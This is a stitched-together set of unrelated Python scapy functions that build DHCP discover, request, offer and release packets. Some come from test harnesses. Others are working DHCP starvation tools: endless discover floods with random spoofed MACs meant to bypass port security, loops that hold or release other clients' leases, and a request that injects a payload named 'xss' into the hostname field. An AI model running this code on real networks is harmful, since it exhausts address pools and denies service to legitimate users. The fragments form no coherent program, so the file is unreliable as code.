def setUp(self): self.worker = _worker() # mock worker self.ap = AP(worker=self.worker, ssl_ctx=SSL_Context(), port_layer_cfg=None, port_id=0, mac="aa:bb:cc:dd:ee:ff", ip="9.9.9.9", port=5555, radio_mac="aa:bb:cc:dd:ee:00", wlc_ip="1.1.1.1", gateway_ip="2.2.2.2") self.client = APClient(self.worker, "aa:aa:aa:aa:aa:aa", None, self.ap) self.client.state = ClientState.RUN self.env = _env() self.tx_conn = _Connection( ) # mock of a multiprocessing.Connection with 'send' and 'recv" methods self.rx_store = _Rx_store() self.offer_template = ( Dot11( FCfield='to-DS', subtype=8, type='Data', ID=0, addr1="ff:ff:ff:ff:ff:ff", addr2="ff:ff:ff:ff:ff:ff", addr3="ff:ff:ff:ff:ff:ff", ) / Dot11QoS() / LLC(dsap=170, ssap=170, ctrl=3) / # aa, aa, 3 SNAP(code=2048) / # ethertype : ipv4 IP(src="0.0.0.0", dst="42.42.42.42") / UDP(sport=67, dport=68) / BOOTP(chaddr=b'123456', xid=42, yiaddr='42.42.42.42') / DHCP(options=[("message-type", "offer"), ("server_id", "1.2.3.4"), "end"])) self.ack_template = ( Dot11( FCfield='to-DS', subtype=8, type='Data', ID=0, addr1="ff:ff:ff:ff:ff:ff", addr2="ff:ff:ff:ff:ff:ff", addr3="ff:ff:ff:ff:ff:ff", ) / Dot11QoS() / LLC(dsap=170, ssap=170, ctrl=3) / # aa, aa, 3 SNAP(code=2048) / # ethertype : ipv4 IP(src="0.0.0.0", dst="42.42.42.42") / UDP(sport=67, dport=68) / BOOTP(chaddr=b'123456', xid=42, yiaddr='42.42.42.42') / DHCP(options=[("message-type", "ack"), "end"]))
def make_dhcp_request(self, my_ip_address, server_id, xid): """ Creates a DHCPREQUEST packet using scapy Parameters --------- my_ip_address : str the IP address assigned by the DHCP Server server_id : str the DHCP Server Identification xid : str the DHCP Transaction id Returns ------- Packet A scapy DHCPREQUEST Packet """ ethernet = Ether(src=self.mac_address, dst="ff:ff:ff:ff:ff:ff") ip = IP(src="0.0.0.0", dst="255.255.255.255") udp = UDP(sport=68, dport=67) bootp = BOOTP(chaddr=self.mac_address_raw, xid=xid) dhcp = DHCP(options=[("message-type", "request"), ("server_id", server_id), ("requested_addr", my_ip_address), ("hostname", self.hostname), "end"]) dhcp_request = ethernet / ip / udp / bootp / dhcp return dhcp_request
def send_discover2(self): print "" print "Starting Endless Starvation, Press e to exit" print "" packet_number = 0 while True: for i in range(255): if keyboard.is_pressed('e'): print "\nEndless Starvation Ended." + str(packet_number) + " Discover Packets sent" print "Close terminal to exit properly" sys.exit() # Generate transaction id transaction_id = random.randint(1, 900000000) # Generate fake CHADDR spoofed_chaddr = str(RandMAC()) while spoofed_chaddr in spoofed_chaddr_list: print "Duplicate SPOOF CHADDR detected, generating a new one" spoofed_chaddr = str(RandMAC()) spoofed_chaddr_list.append(spoofed_chaddr) # Create discover packet, specifying source mac to bypass port security discover_packet = Ether(src=source_mac,dst="ff:ff:ff:ff:ff:ff") discover_packet /= IP(src="0.0.0.0", dst="255.255.255.255") discover_packet /= UDP(sport=68, dport=67) discover_packet /= BOOTP(chaddr=spoofed_chaddr, xid=transaction_id) discover_packet /= DHCP(options=[("message-type", "discover"), "end"]) sendp(discover_packet, iface=interface, verbose=0) packet_number += 1 sleep(0.01)
def packet_analyzer(self, packet): # Check for DHCP packet if DHCP in packet: # Check for Offer message if packet[DHCP].options[0][1] == 2: server_ip = packet[IP].src client_mac = packet[BOOTP].chaddr offered_ip = packet[BOOTP].yiaddr transaction_id = packet[BOOTP].xid # Create request packet, specifying source mac to bypass port security request_packet = Ether(src=source_mac,dst="ff:ff:ff:ff:ff:ff") request_packet /= IP(src="0.0.0.0", dst="255.255.255.255") request_packet /= UDP(sport=68, dport=67) request_packet /= BOOTP(chaddr=client_mac, xid=transaction_id) request_packet /= DHCP(options=[("message-type", "request"), ("server_id", server_ip), ("requested_addr", offered_ip), "end"]) sendp(request_packet, iface=interface, verbose=0) # Check for ACK message elif packet[DHCP].options[0][1] == 5: client_mac = packet[BOOTP].chaddr leased_ip = packet[BOOTP].yiaddr leased_ip_list.append(leased_ip) print leased_ip + " has been leased to " + client_mac + ". Total IPs leased: " + str(len(leased_ip_list)) # Check for NAK message elif packet[DHCP].options[0][1] == 6: print " NAK Received"
def main(): """Send DHCP DISCOVER packet.""" args = TrafficScriptArg(['tx_src_ip', 'tx_dst_ip']) tx_if = args.get_arg('tx_if') rx_if = args.get_arg('rx_if') rxq = RxQueue(rx_if) txq = TxQueue(tx_if) tx_src_ip = args.get_arg('tx_src_ip') tx_dst_ip = args.get_arg('tx_dst_ip') sent_packets = [] dhcp_discover = Ether(dst="ff:ff:ff:ff:ff:ff") / \ IP(src=tx_src_ip, dst=tx_dst_ip) / \ UDP(sport=UDP_SERVICES.bootpc, dport=UDP_SERVICES.bootps) / \ BOOTP(op=1,) / \ DHCP(options=[("message-type", "discover"), "end"]) sent_packets.append(dhcp_discover) txq.send(dhcp_discover) for _ in range(10): dhcp_discover = rxq.recv(2) if is_discover(dhcp_discover): break else: raise RuntimeError("DHCP DISCOVER Rx timeout") sys.exit(0)
def discover_dhcp(_mac, _id): packet_discovery = Ether(src=local_mac, dst='ff:ff:ff:ff:ff:ff') / IP( src='0.0.0.0', dst='255.255.255.255') / UDP( sport=2001, dport=67) / BOOTP( chaddr=_mac.decode('hex'), xid=_id) / DHCP(options=[('message-type', 'discover'), 'end']) sendp(packet_discovery, verbose=False)
def _construct_dhcp_msg(self, options=None): return \ Ether(src=self.mac, dst=B_MAC) \ / CLIENT_IP_HEADER \ / CLIENT_UDP_HEADER \ / BOOTP(chaddr=self.chaddr, xid=self._xid) \ / DHCP(options=options)
def send_dhcp_packet(self, mac: MacAddress, vlan: str, state: DHCPState, dhcp_desc: DHCPDescriptor = None): """ Send DHCP packet and record state in dhcp_client_state. Args: mac: MAC address of interface state: state of DHCP packet dhcp_desc: DHCP protocol state. Returns: """ ciaddr = None # generate DHCP request packet if state == DHCPState.DISCOVER: dhcp_opts = [("message-type", "discover")] dhcp_desc = DHCPDescriptor(mac=mac, ip="", vlan=vlan, state_requested=DHCPState.DISCOVER) self._msg_xid = self._msg_xid + 1 pkt_xid = self._msg_xid elif state == DHCPState.REQUEST: dhcp_opts = [("message-type", "request"), ("requested_addr", dhcp_desc.ip), ("server_id", dhcp_desc.server_ip)] dhcp_desc.state_requested = DHCPState.REQUEST pkt_xid = dhcp_desc.xid ciaddr = dhcp_desc.ip elif state == DHCPState.RELEASE: dhcp_opts = [("message-type", "release"), ("server_id", dhcp_desc.server_ip)] dhcp_desc.state_requested = DHCPState.RELEASE self._msg_xid = self._msg_xid + 1 pkt_xid = self._msg_xid ciaddr = dhcp_desc.ip else: LOG.warning("Unknown egress request mac %s state %s", str(mac), state) return dhcp_opts.append("end") dhcp_desc.xid = pkt_xid with self._dhcp_notify: self.dhcp_client_state[mac.as_redis_key(vlan)] = dhcp_desc pkt = Ether(src=str(mac), dst="ff:ff:ff:ff:ff:ff") if vlan and vlan != "0": pkt /= Dot1Q(vlan=int(vlan)) pkt /= IP(src="0.0.0.0", dst="255.255.255.255") pkt /= UDP(sport=68, dport=67) pkt /= BOOTP(op=1, chaddr=mac.as_hex(), xid=pkt_xid, ciaddr=ciaddr) pkt /= DHCP(options=dhcp_opts) LOG.debug("DHCP pkt xmit %s", pkt.show(dump=True)) sendp(pkt, iface=self._dhcp_interface, verbose=0)
def dhcp_request(tx_if, rx_if, tx_src_ip, tx_dst_ip, server_ip, proxy_ip, client_ip, client_mac): """Send and check DHCP REQUEST proxy packet.""" rxq = RxQueue(rx_if) txq = TxQueue(tx_if) sent_packets = [] dhcp_request = Ether(src=client_mac, dst="ff:ff:ff:ff:ff:ff") / \ IP(src=tx_src_ip, dst=tx_dst_ip) / \ UDP(sport=UDP_SERVICES.bootpc, dport=UDP_SERVICES.bootps) / \ BOOTP(op=1, giaddr=proxy_ip, siaddr=server_ip) / \ DHCP(options=[("message-type", "request"), ("server_id", server_ip), ("requested_addr", client_ip), "end"]) sent_packets.append(dhcp_request) txq.send(dhcp_request) ether = rxq.recv(2) if ether is None: raise RuntimeError('DHCP REQUEST timeout') if ether[IP].dst != server_ip: raise RuntimeError("Destination IP address error.") print "Destination IP address: OK." if ether[IP].src != proxy_ip: raise RuntimeError("Source IP address error.") print "Source IP address: OK." if ether[UDP].dport != UDP_SERVICES.bootps: raise RuntimeError("UDP destination port error.") print "UDP destination port: OK." if ether[UDP].sport != UDP_SERVICES.bootpc: raise RuntimeError("UDP source port error.") print "UDP source port: OK." if ether[BOOTP].siaddr != server_ip: raise RuntimeError("DHCP server IP address error.") print "DHCP server IP address: OK." if ether[DHCP].options[2][1] != client_ip: raise RuntimeError("Requested IP address error.") print "Requested IP address: OK." if ether[DHCP].options[3][0] != 'relay_agent_Information': # option 82 raise RuntimeError("Relay agent information error.") if ether[DHCP].options[0][1] != 3: # 2 - REQUEST message raise RuntimeError("DHCP REQUEST message error.") print "DHCP REQUEST message: OK."
def request_dhcp(_mac, _id): packet_request = Ether(src=local_mac, dst='ff:ff:ff:ff:ff:ff') / IP( src='0.0.0.0', dst='255.255.255.255') / UDP( sport=2001, dport=67) / BOOTP( chaddr=_mac.decode('hex'), xid=_id) / DHCP( options=[('message-type', 'request'), ('requested_addr', ip_offered), ('server_id', dhcp_option_54), 'end']) sendp(packet_request, verbose=False)
def generatePacketClient(self,type, mac): return (Ether(src=mac, dst="ff:ff:ff:ff:ff:ff") / IP(src="0.0.0.0", dst="255.255.255.255") / UDP(sport=68, dport=67) / BOOTP(chaddr=mac) / DHCP(options=[ ('message-type', type), ("server_id", self.__GATEWAY_IP), "end"]))
def release(self, serverIP, releaseIP, releaseMAC): releaseMACraw = mac2str(releaseMAC) dhcp_release = IP(dst=serverIP) dhcp_release /= UDP(sport=68, dport=67) dhcp_release /= BOOTP(chaddr=releaseMACraw, ciaddr=releaseIP, xid=random.randint(1, 900000000)) dhcp_release /= DHCP(options=[('message-type', 'release'), ("server_id", serverIP), ('client-identifier', releaseMACraw), 'end']) send(dhcp_release, verbose=0) print releaseIP + " has been released" starve_menu()
def discovery_spoofing(interface, target): inface = '' targ = '' if len(interface) == 0: inface = conf.iface else: inface = interface if len(target) == 0: targ = '255.255.255.255' else: targ = target real_mac = get_if_hwaddr(conf.iface) src_client_ip = '0.0.0.0' port_client = 68 port_dhcp = 67 yiaddr_client = "0.0.0.0" broadcast_mac = "ff:ff:ff:ff:ff:ff" while True: client_mac = RandMAC() transaction_ID = random.randint(0, (2**16) - 1) # send discovery discovery = Ether(src=real_mac, dst=broadcast_mac) \ / IP(src=src_client_ip, dst=targ) \ / UDP(sport=port_client, dport=port_dhcp) \ / BOOTP(chaddr=[mac2str(client_mac)], xid=transaction_ID, flags=0xFFFFFF) \ / DHCP( options=[("message-type", "discover"), ('max_dhcp_size', 1500), ("client_id,", mac2str(client_mac)), ('requested_addr', yiaddr_client), ('lease_time', 10000), ('end', 0)]) sendp(discovery, iface=inface) # send request offer = '192.168.56.' offer = offer + str(random.randint(100, 150)) request = Ether(src=real_mac, dst=broadcast_mac) \ / IP(src=src_client_ip, dst=targ) \ / UDP(sport=port_client, dport=port_dhcp) \ / BOOTP(chaddr=[mac2str(client_mac)], xid=transaction_ID, flags=0xFFFFFF) \ / DHCP( options=[("message-type", "request"), ('max_dhcp_size', 1500), ("client_id,", mac2str(client_mac)), ('requested_addr', offer), ('lease_time', 10000), ('end', 0), ]) sendp(request, iface=inface)
def dhcp_offer(rx_if, tx_if, tx_dst_ip, server_ip, proxy_ip, client_ip, server_mac, option_82): """Send and check DHCP OFFER proxy packet.""" rxq = RxQueue(rx_if) txq = TxQueue(tx_if) sent_packets = [] dhcp_offer = Ether(src=server_mac, dst="ff:ff:ff:ff:ff:ff") / \ IP(src=server_ip, dst=tx_dst_ip) / \ UDP(sport=UDP_SERVICES.bootps, dport=UDP_SERVICES.bootpc) / \ BOOTP(op=2, yiaddr=client_ip, siaddr=server_ip) / \ DHCP(options= [("message-type", "offer"), ("server_id", server_ip), ("relay_agent_Information", option_82), "end"]) txq.send(dhcp_offer) sent_packets.append(dhcp_offer) ether = rxq.recv(2) if ether is None: raise RuntimeError('DHCP OFFER timeout') if ether[IP].dst != tx_dst_ip: raise RuntimeError("Destination IP address error.") print "Destination IP address: OK." if ether[IP].src != proxy_ip: raise RuntimeError("Source IP address error.") print "Source IP address: OK." if ether[UDP].dport != UDP_SERVICES.bootpc: raise RuntimeError("UDP destination port error.") print "UDP destination port: OK." if ether[UDP].sport != UDP_SERVICES.bootps: raise RuntimeError("UDP source port error.") print "UDP source port: OK." if ether[BOOTP].yiaddr != client_ip: raise RuntimeError("Client IP address error.") print "Client IP address: OK." if ether[BOOTP].siaddr != server_ip: raise RuntimeError("DHCP server IP address error.") print "DHCP server IP address: OK." if ether[DHCP].options[0][1] != 2: # 2 - OFFER message raise RuntimeError("DHCP OFFER message error.") print "DHCP OFFER message OK."
def build_msg(opts): conf.checkIPaddr = False msg_flag = 0 import sys if sys.platform != "darwin": fam, hw = get_if_raw_hwaddr(str(world.cfg["iface"])) else: # TODO fix this for MAC OS, this is temporary quick fix just for my local system hw = convert_MAC("0a:00:27:00:00:00") tmp_hw = None # we need to choose if we want to use chaddr, or client id. # also we can include both: client_id and chaddr if world.cfg["values"]["chaddr"] is None or world.cfg["values"][ "chaddr"] == "default": tmp_hw = hw elif world.cfg["values"]["chaddr"] == "empty": tmp_hw = convert_MAC("00:00:00:00:00:00") else: tmp_hw = convert_MAC(world.cfg["values"]["chaddr"]) if world.cfg["values"]["broadcastBit"]: # value for setting 1000 0000 0000 0000 in bootp message in field 'flags' for broadcast msg. msg_flag = 32768 else: msg_flag = 0 msg = Ether(dst="ff:ff:ff:ff:ff:ff", src=hw) msg /= IP( src=world.cfg["source_IP"], dst=world.cfg["destination_IP"], ) msg /= UDP(sport=world.cfg["source_port"], dport=world.cfg["destination_port"]) msg /= BOOTP(chaddr=tmp_hw, giaddr=world.cfg["values"]["giaddr"], flags=msg_flag, hops=world.cfg["values"]["hops"]) # BOOTP requests can be optionless if len(opts) > 0: opts += ["end"] # end option msg /= DHCP(options=opts) #transaction id if world.cfg["values"]["tr_id"] is None: msg.xid = randint(0, 256 * 256 * 256) else: msg.xid = int(world.cfg["values"]["tr_id"]) world.cfg["values"]["tr_id"] = msg.xid msg.siaddr = world.cfg["values"]["siaddr"] msg.ciaddr = world.cfg["values"]["ciaddr"] msg.yiaddr = world.cfg["values"]["yiaddr"] msg.htype = world.cfg["values"]["htype"] return msg
def gen_bootp_unicast(self): """Generates BOOTP layer part of unicast DHCP packet. Same comments as in gen_bootp """ bootp = (BOOTP(chaddr=[mac2str(self.client_mac)], xid=self.xid, ciaddr=self.client_ip)) return bootp
def gen_udp_bootp(self): udp_bootp = ( UDP(sport=self.client_port, dport=self.server_port) / # MAY # BOOTP(chaddr=[self.client_mac], xid=self.client_xid) / # 3.4. The presence of "Client hardware address" (chaddr) # is necessary for the proper operation of the DHCP service. BOOTP(chaddr=[mac2str(self.client_mac)]) ) return udp_bootp
def build_discover(local_mac_addr, trans_id, hostname): """ build a DHCP discover packet :param local_mac_addr: the mac address :param trans_id: the transaction IDx :param hostname: the host name :return: scapy DHCP discover packet """ return Ether(src=local_mac_addr, dst="ff:ff:ff:ff:ff:ff") / IP(src="0.0.0.0", dst="255.255.255.255") \ / UDP(sport=68, dport=67) / BOOTP(chaddr=str_2_mac(local_mac_addr), xid=trans_id) \ / DHCP(options=[("message-type", "discover"), ("hostname", hostname), "end"])
def _release (self, pipe): ''' Release the DHCP lease ''' self.log('DHCP: {0} ---> RELEASING'.format(self.mac)) yield pipe.async_tx_pkt(Ether(dst=self.record.server_mac)/IP(src=self.record.client_ip,dst=self.record.server_ip)/UDP(sport=68,dport=67) \ /BOOTP(ciaddr=self.record.client_ip,chaddr=self.mac_bytes,xid=self.xid) \ /DHCP(options=[("message-type","release"),("server_id",self.record.server_ip), "end"])) self.record = None
def send_dhcp_discover(mac): dst_mac = "ff:ff:ff:ff:ff:ff" # Broadcast address fake_mac = mac options = [("message-type", "discover"), ("max_dhcp_size", 1500), ("client_id", fake_mac), ("lease_time", 10000), ("end", "0")] transaction_id = random.randint(1, 900000000) dhcp_request = ( Ether(src=src_mac, dst=dst_mac) / IP(src="0.0.0.0", dst=target) / UDP(sport=68, dport=67) / BOOTP(chaddr=[fake_mac], xid=transaction_id, flags=0xFFFFFFFF) / DHCP(options=options)) sendp(dhcp_request, iface=iface, verbose=False)
def is_DHCP(pkt): global src_mac global xi global follow global inter if DHCP in pkt: if pkt[BOOTP].op == 2: ethernet = Ether(dst='ff:ff:ff:ff:ff:ff', src=src_mac, type=0x800) ip = IP(src="0.0.0.0", dst="255.255.255.255", id=0x00, tos=0x10) udp = UDP(sport=68, dport=67) res = src_mac.split(":") ch = "" for i in res: ch = ch + chr(int(i, 16)) host = xss bootps = BOOTP(xid=int(xi, 16), ciaddr='0.0.0.0', chaddr=ch) ipServer = pkt[IP].src ipCliente = pkt[BOOTP].yiaddr dhcps = DHCP( options=[("message-type", "request"), ( "server_id", ipServer), ("requested_addr", ipCliente), ("hostname", host), ("param_req_list", chr(scapy.all.DHCPRevOptions["subnet_mask"][0]), chr(scapy.all.DHCPRevOptions["router"][0]), chr(scapy.all.DHCPRevOptions["name_server"][0]), chr(15)), "end"]) packet = ethernet / ip / udp / bootps / dhcps pkt = srp1(packet, iface=inter, verbose=1) if DHCP in pkt: print pkt.summary() for x in pkt[DHCP].options: if x[0] == "router": gateway = x[1] elif x[0] == "subnet_mask": netmask = x[1] elif x[0] == "name_server": servername = x[1] elif x[0] == "message-type": messageType = x[1] if messageType == 5: os.system("ifconfig " + inter + " " + ipCliente + " netmask " + netmask) os.system("cp /etc/resolv.conf /etc/resolv.conf.old") os.system("echo nameserver " + servername + " > /etc/resolv.conf") os.system("ip route add default via " + gateway + " dev " + inter) follow = True
def build_request(mac_addr, target, req_ip, hostname, trans_id): """ build a DHCP request packet :param mac_addr: the mac address :param target: the target server's ip which we are going to attack. (this is the dst ip) :param req_ip: the requested IP :param hostname: the host name :param trans_id: the transaction ID :return: scapy DHCP request packet """ return Ether(src=str(mac_addr), dst="ff:ff:ff:ff:ff:ff") / IP(src="0.0.0.0", dst="255.255.255.255") \ / UDP(sport=68, dport=67) / BOOTP(chaddr=str_2_mac(mac_addr), xid=trans_id) \ / DHCP(options=[("message-type", "request"), ("server_id", target), ("requested_addr", req_ip), ("hostname", hostname), ("param_req_list", 0), "end"])
def dhcpRequest(dhcp_offer, src_mac_random, interface): transaction_id = dhcp_offer[0][BOOTP].xid server_id = dhcp_offer[0][DHCP].options[1][1] requested_addr = dhcp_offer[0][BOOTP].yiaddr print(requested_addr) options = [("message-type", "request"), ("server_id", server_id), ("requested_addr", requested_addr), ("end", "0")] dhcp_request = Ether(dst='ff:ff:ff:ff:ff:ff', src=src_mac_random) \ / IP(src='0.0.0.0', dst='255.255.255.255') \ / UDP(sport=68, dport=67) \ / BOOTP(chaddr=[mac2str(src_mac_random)], xid=transaction_id) \ / DHCP(options=options) sendp(dhcp_request, iface=interface) return requested_addr
def dhcp_discover(tx_if, rx_if, tx_src_ip, tx_dst_ip, server_ip, proxy_ip, client_mac): """Send and check DHCP DISCOVER proxy packet.""" rxq = RxQueue(rx_if) txq = TxQueue(tx_if) sent_packets = [] dhcp_discover = Ether(src=client_mac, dst="ff:ff:ff:ff:ff:ff") / \ IP(src=tx_src_ip, dst=tx_dst_ip) / \ UDP(sport=UDP_SERVICES.bootpc, dport=UDP_SERVICES.bootps) / \ BOOTP(op=1,) / \ DHCP(options=[("message-type", "discover"), "end"]) sent_packets.append(dhcp_discover) txq.send(dhcp_discover) ether = rxq.recv(2) if ether is None: raise RuntimeError('DHCP DISCOVER timeout') if ether[IP].src != proxy_ip: raise RuntimeError("Source IP address error.") print "Source IP address: OK." if ether[IP].dst != server_ip: raise RuntimeError("Destination IP address error.") print "Destination IP address: OK." if ether[UDP].dport != UDP_SERVICES.bootps: raise RuntimeError("UDP destination port error.") print "UDP destination port: OK." if ether[UDP].sport != UDP_SERVICES.bootpc: raise RuntimeError("UDP source port error.") print "UDP source port: OK." if ether[DHCP].options[1][0] != 'relay_agent_Information': # option 82 raise RuntimeError("Relay agent information error.") option_82 = ether[DHCP].options[1][1] if ether[DHCP].options[0][1] != 1: # 1 - DISCOVER message raise RuntimeError("DHCP DISCOVER message error.") print "DHCP DISCOVER message OK." return option_82
def persistant(mac_and_ip, dhcp_server_ip, interface): while (True): for i in mac_and_ip: transaction_id = random.randint(1, 900000000) server_id = dhcp_server_ip requested_addr = i[0] options = [("message-type", "request"), ("server_id", server_id), ("requested_addr", requested_addr), ("end", "0")] dhcp_request = Ether(dst='ff:ff:ff:ff:ff:ff', src=i[1]) \ / IP(src=requested_addr, dst='255.255.255.255') \ / UDP(sport=68, dport=67) \ / BOOTP(chaddr=[mac2str(i[1])], xid=transaction_id) \ / DHCP(options=options) sendp(dhcp_request, iface=interface) sleep(120)
def dhcpDiscover(src_mac_random, dhcp_server_ip, interface): options = [("message-type", "discover"), ("max_dhcp_size", 1500), ("client_id", mac2str(src_mac_random)), ("lease_time", 10000), ("end", "0")] transaction_id = random.randint(1, 900000000) dhcp_discover = Ether(dst='ff:ff:ff:ff:ff:ff', src=src_mac_random) \ / IP(src='0.0.0.0', dst=dhcp_server_ip) \ / UDP(sport=68, dport=67) \ / BOOTP(chaddr=[mac2str(src_mac_random)], xid=transaction_id, flags=0xffffff) \ / DHCP(options=options) sendp(dhcp_discover, iface=interface) dhcp_offer = sniff( count=1, lfilter=lambda p: BOOTP in p and p[BOOTP].xid == transaction_id) return dhcp_offer
def send_dhcp_renew_address(info): dst_mac = info['srv_mac'] # Broadcast address fake_mac = info['fake_mac'] options = [("message-type", "request"), ("max_dhcp_size", 1500), ("client_id", fake_mac), ("lease_time", 10000), ("server_id", info['srv_id']), ("end", "0")] transaction_id = random.randint(1, 900000000) dhcp_request = (Ether(src=src_mac, dst=dst_mac) / IP(src=info['taken_ip'], dst=info['srv_ip']) / UDP(sport=68, dport=67) / BOOTP(chaddr=[fake_mac], ciaddr=info['taken_ip'], xid=transaction_id, flags=0x0) / DHCP(options=options)) sendp(dhcp_request, iface=iface, verbose=False)
def gen_bootp(self): """Generates BOOTP layer part of DHCP packet. [ :rfc:`7844#section-3.4` ] :: The presence of this address is necessary for the proper operation of the DHCP service. [:rfc:`7844#section-3.`] :: MAY contain the Client Identifier option, """ bootp = (BOOTP(chaddr=[mac2str(self.client_mac)], xid=self.xid)) return bootp
def __init__ (self): base_pkt = Ether(dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67,chksum=0) \ /BOOTP(chaddr=b'123456',xid=55555,yiaddr='1.2.3.4')/DHCP(options=[("message-type","discover"), ("server_id", '1.2.3.4'),"end"]) FastParser.__init__(self, base_pkt) self.add_field('Ethernet.dst', 'dstmac') self.add_field('Ethernet.src', 'srcmac') self.add_field('IP.ihl', 'ihl', fmt = "!B") self.add_field('IP.dst', 'dstip') self.add_field('IP.src', 'srcip') self.add_field('IP.chksum', 'chksum') self.add_field('BOOTP.xid', 'xid') self.add_field('BOOTP.chaddr', 'chaddr') self.add_field('BOOTP.ciaddr', 'ciaddr') self.add_field('BOOTP.yiaddr', 'yiaddr') self.add_field('DHCP options.options', 'options', getter = self.get_options, setter = self.set_options) msg_types = [{'id': 1, 'name': 'discover'}, {'id': 2, 'name': 'offer'}, {'id': 3, 'name': 'request'}, ] self.msg_types = {} for t in msg_types: self.msg_types[t['id']] = t self.msg_types[t['name']] = t opts = [{'id': 53, 'name': 'message-type', 'type': 'byte'}, {'id': 54, 'name': 'server_id', 'type': 'int'}, {'id': 50, 'name': 'requested_addr', 'type': 'int'}, {'id': 51, 'name': 'lease-time', 'type': 'int'}, {'id': 58, 'name': 'renewal_time', 'type': 'int'}, {'id': 59, 'name': 'rebinding_time', 'type': 'int'}, {'id': 1, 'name': 'subnet_mask', 'type': 'int'}, {'id': 15, 'name': 'domain', 'type': 'str'}, ] self.opts = {} for opt in opts: self.opts[opt['id']] = opt self.opts[opt['name']] = opt
def make_dhcp_discover(self): """ Creates a DHCPDISCOVER packet using scapy Returns ------- Packet A scapy DHCPDISCOVER Packet """ ethernet = Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') ip = IP(src='0.0.0.0', dst='255.255.255.255') udp = UDP(dport=67, sport=68) bootp = BOOTP(chaddr=self.mac_address_raw, xid=RandInt()) dhcp = DHCP(options=[('message-type', 'discover'), ("hostname", self.hostname), 'end']) dhcp_discover_pkt = ethernet / ip / udp / bootp / dhcp return dhcp_discover_pkt